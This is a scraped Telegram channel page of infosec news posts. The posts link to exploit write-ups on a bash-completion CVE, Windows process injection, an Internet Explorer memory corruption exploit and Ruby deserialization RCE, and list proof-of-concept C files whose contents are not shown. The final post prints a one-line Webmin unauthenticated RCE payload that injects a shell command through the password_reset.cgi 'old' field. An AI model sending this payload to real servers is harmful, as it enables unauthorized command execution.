Information Security
@sec_nerd_en
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
About
Blog
Apps
Platform
Join
Information Security
408 subscribers
Information Security
Malicious Command Execution via bash-completion (CVE-2018-7738)

https://blog.grimm-co.com/post/malicious-command-execution-via-bash-completion-cve-2018-7738/


#linux
#bash
#exploit

@sec_nerd_en
46 views
Information Security
Windows Process Injection: PROPagate

https://modexp.wordpress.com/2018/08/23/process-injection-propagate/


#windows
#exploit

@sec_nerd_en
modexp
Windows Process Injection: PROPagate
Introduction In October 2017, Adam at Hexacorn published details of a process injection technique called PROPagate. In his post, he describes how any process that uses subclassed windows has the po…
44 views
Information Security
Here is the report for CVE-2018-8373 exploit (Internet Explorer Memory Corruption Vulnerability)

https://app.any.run/tasks/d7ae8ea4-9767-44de-9784-b5cdb4ee1756

#exploit #malware #cve20188373
app.any.run
http://cve-2018-8373.any.run/ - Interactive analysis - ANY.RUN
Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.
46 views
Information Security
Forwarded from امنیت اطلاعات
poc-exploit.c
7.4 KB
#linux
#privesc
#exploit

@sec_nerd
18 views
Information Security
Forwarded from امنیت اطلاعات
poc-suidbin.c
1.4 KB
#linux
#privesc
#exploit

@sec_nerd
23 views
Information Security
Something special for the weekend...: A nice writeup on Universal #RCE #exploit by exploiting #Ruby 2.x #serialization


https://www.elttam.com.au/blog/ruby-deserialization/
61 views
Information Security
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"


PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id


https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html



#webmin
#exploit
#rce


@sec_nerd
11 views